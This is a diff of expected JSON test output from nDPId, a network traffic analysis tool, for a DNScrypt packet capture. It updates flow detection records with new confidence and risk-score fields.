AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA="}
-00686{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":137,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":60,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739305219,"flow_last_seen":946739305219,"flow_idle_time":180000,"flow_min_l4_payload_len":1472,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1472,"flow_avg_l4_payload_len":1472,"midstream":0,"ts_msec":946739305219,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"142.4.204.111","src_port":46856,"dst_port":443,"l4_proto":"udp","ndpi": {"flow_risk": {"5":"Known protocol on non standard port"},"proto":"DNScrypt","breed":"Safe","category":"Network"}}
+00795{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":137,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":60,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739305219,"flow_last_seen":946739305219,"flow_idle_time":180000,"flow_min_l4_payload_len":1472,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1472,"flow_avg_l4_payload_len":1472,"midstream":0,"ts_msec":946739305219,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"142.4.204.111","src_port":46856,"dst_port":443,"l4_proto":"udp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}}
 00427{"packet_event_id":1,"packet_event_name":"packet","thread_id":0,"packet_id":138,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":94,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":94,"pkt_l4_len":0,"ts_msec":946739305219,"pkt":"REREREREZmZmZmZmCABFAABQiB8Aub0RWZQKAAABjgTMbwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA=="}
 00209{"basic_event_id":9,"basic_event_name":"nDPI IPv4\/L4 payload detection failed","datalink":1,"thread_id":0,"packet_id":138,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","l4_data_len":60}
 00693{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":139,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":53,"flow_packet_id":2,"flow_last_seen":946739305220,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":222,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":222,"pkt_l4_len":188,"ts_msec":946739305220,"pkt":"ZmZmZmZmRERERERECABFAADQ+LhAADgRZ23DHl4cCgAAASD70jMAvJuWMsmAAAABAAEAAAAAATINZG5zY3J5cHQtY2VydAVmZm11YwNuZXQAABAAAcAMABAAAQAADhAAfXxETlNDAAEAANu1cuNn82W5kyvuIYj3yDd11LkL534iAFDK9fBQA07jnu8CUEQwYJt1XxEE91D0YyFd2wLooVHv9yyAcc0SAAB5FL6yNLYbucmv1fHy4RsAcOv\/0XhGDt+qQ0bl\/YNRIXkUvrI0thu5ATQ9Gl8jB9hnnVXw"}
@@ -300,57 +300,57 @@
 00702{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":143,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":57,"flow_packet_id":2,"flow_last_seen":946739305326,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":228,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":228,"pkt_l4_len":194,"ts_msec":946739305326,"pkt":"ZmZmZmZmRERERERECABFAADWg1AAADQR55aOBMxvCgAAAQG7gS8AwlgaAg6BgAABAAEAAAAAATINZG5zY3J5cHQtY2VydANuczMCY2EFbHVnZ3MCY28AABAAAcAMABAAAQAAAAAAfXxETlNDAAEAAG0rJMeHQmadAAjPo7oVfCGn+vVnYNn+3VnMSzQY0rAkl3fyY6FeDYzevPOP9Wx6CFjMcHM\/npT74\/JxSlg\/ZQ+xYYapuSWJmSy0bkM5eaAYWq1iOjOwzrlApye0OOzsPbFhhqm5JYmZWX62h1l+todsSrmH"}
 00596{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":144,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":61,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739305327,"flow_last_seen":946739305327,"flow_idle_time":180000,"flow_min_l4_payload_len":512,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":512,"flow_avg_l4_payload_len":512,"midstream":0,"ts_msec":946739305327,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"149.112.112.10","src_port":50035,"dst_port":8443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 01135{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":144,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":61,"flow_packet_id":1,"flow_last_seen":946739305327,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":554,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":554,"pkt_l4_len":520,"ts_msec":946739305327,"pkt":"REREREREZmZmZmZmCABFAAIcwI1AAL0RNQwKAAABlXBwCsNzIPsCCMhQbAABAAABAAAAAAABATINZG5zY3J5cHQtY2VydAVxdWFkOQNuZXQAABAAAQAAAAAAAAAAAAHKAAwBxgAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA="}
-00627{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":144,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":61,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739305327,"flow_last_seen":946739305327,"flow_idle_time":180000,"flow_min_l4_payload_len":512,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":512,"flow_avg_l4_payload_len":512,"midstream":0,"ts_msec":946739305327,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"149.112.112.10","src_port":50035,"dst_port":8443,"l4_proto":"udp","ndpi": {"proto":"DNScrypt","breed":"Safe","category":"Network"}}
+00653{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":144,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":61,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739305327,"flow_last_seen":946739305327,"flow_idle_time":180000,"flow_min_l4_payload_len":512,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":512,"flow_avg_l4_payload_len":512,"midstream":0,"ts_msec":946739305327,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"149.112.112.10","src_port":50035,"dst_port":8443,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}}
 00600{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":145,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":62,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739305327,"flow_last_seen":946739305327,"flow_idle_time":180000,"flow_min_l4_payload_len":1472,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1472,"flow_avg_l4_payload_len":1472,"midstream":0,"ts_msec":946739305327,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"149.112.112.10","src_port":40009,"dst_port":8443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 02419{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":145,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":62,"flow_packet_id":1,"flow_last_seen":946739305327,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":1514,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1514,"pkt_l4_len":1480,"ts_msec":946739305327,"pkt":"REREREREZmZmZmZmCABFAAXcwI4gAL0RUUsKAAABlXBwCpxJIPsGBPr0a\/0BAAABAAAAAAABATINZG5zY3J5cHQtY2VydAVxdWFkOQNuZXQAABAAAQAAAAAAAAAAAAXGAAwFwgAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA="}
-00631{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":145,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":62,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739305327,"flow_last_seen":946739305327,"flow_idle_time":180000,"flow_min_l4_payload_len":1472,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1472,"flow_avg_l4_payload_len":1472,"midstream":0,"ts_msec":946739305327,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"149.112.112.10","src_port":40009,"dst_port":8443,"l4_proto":"udp","ndpi": {"proto":"DNScrypt","breed":"Safe","category":"Network"}}
+00657{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":145,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":62,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739305327,"flow_last_seen":946739305327,"flow_idle_time":180000,"flow_min_l4_payload_len":1472,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1472,"flow_avg_l4_payload_len":1472,"midstream":0,"ts_msec":946739305327,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"149.112.112.10","src_port":40009,"dst_port":8443,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}}
 00427{"packet_event_id":1,"packet_event_name":"packet","thread_id":0,"packet_id":146,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":94,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":94,"pkt_l4_len":0,"ts_msec":946739305327,"pkt":"REREREREZmZmZmZmCABFAABQwI4Aub0Rdh4KAAABlXBwCgAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA=="}
 00209{"basic_event_id":9,"basic_event_name":"nDPI IPv4\/L4 payload detection failed","datalink":1,"thread_id":0,"packet_id":146,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","l4_data_len":60}
 00600{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":147,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":63,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739305327,"flow_last_seen":946739305327,"flow_idle_time":180000,"flow_min_l4_payload_len":1472,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1472,"flow_avg_l4_payload_len":1472,"midstream":0,"ts_msec":946739305327,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"149.112.112.10","src_port":56022,"dst_port":8443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 02419{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":147,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":63,"flow_packet_id":1,"flow_last_seen":946739305327,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":1514,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1514,"pkt_l4_len":1480,"ts_msec":946739305327,"pkt":"REREREREZmZmZmZmCABFAAXcwI8gAL0RUUoKAAABlXBwCtrWIPsGBLxpa\/sBAAABAAAAAAABATINZG5zY3J5cHQtY2VydAVxdWFkOQNuZXQAABAAAQAAAAAAAAAAAAXGAAwFwgAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA="}
-00631{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":147,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":63,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739305327,"flow_last_seen":946739305327,"flow_idle_time":180000,"flow_min_l4_payload_len":1472,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1472,"flow_avg_l4_payload_len":1472,"midstream":0,"ts_msec":946739305327,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"149.112.112.10","src_port":56022,"dst_port":8443,"l4_proto":"udp","ndpi": {"proto":"DNScrypt","breed":"Safe","category":"Network"}}
+00657{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":147,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":63,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739305327,"flow_last_seen":946739305327,"flow_idle_time":180000,"flow_min_l4_payload_len":1472,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1472,"flow_avg_l4_payload_len":1472,"midstream":0,"ts_msec":946739305327,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"149.112.112.10","src_port":56022,"dst_port":8443,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}}
 00427{"packet_event_id":1,"packet_event_name":"packet","thread_id":0,"packet_id":148,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":94,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":94,"pkt_l4_len":0,"ts_msec":946739305327,"pkt":"REREREREZmZmZmZmCABFAABQwI8Aub0Rdh0KAAABlXBwCgAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA=="}
 00209{"basic_event_id":9,"basic_event_name":"nDPI IPv4\/L4 payload detection failed","datalink":1,"thread_id":0,"packet_id":148,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","l4_data_len":60}
 00600{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":149,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":64,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739305327,"flow_last_seen":946739305327,"flow_idle_time":180000,"flow_min_l4_payload_len":1472,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1472,"flow_avg_l4_payload_len":1472,"midstream":0,"ts_msec":946739305327,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"149.112.112.10","src_port":42570,"dst_port":8443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 02419{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":149,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":64,"flow_packet_id":1,"flow_last_seen":946739305327,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":1514,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1514,"pkt_l4_len":1480,"ts_msec":946739305327,"pkt":"REREREREZmZmZmZmCABFAAXcwJEgAL0RUUgKAAABlXBwCqZKIPsGBPDxa\/8BAAABAAAAAAABATINZG5zY3J5cHQtY2VydAVxdWFkOQNuZXQAABAAAQAAAAAAAAAAAAXGAAwFwgAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA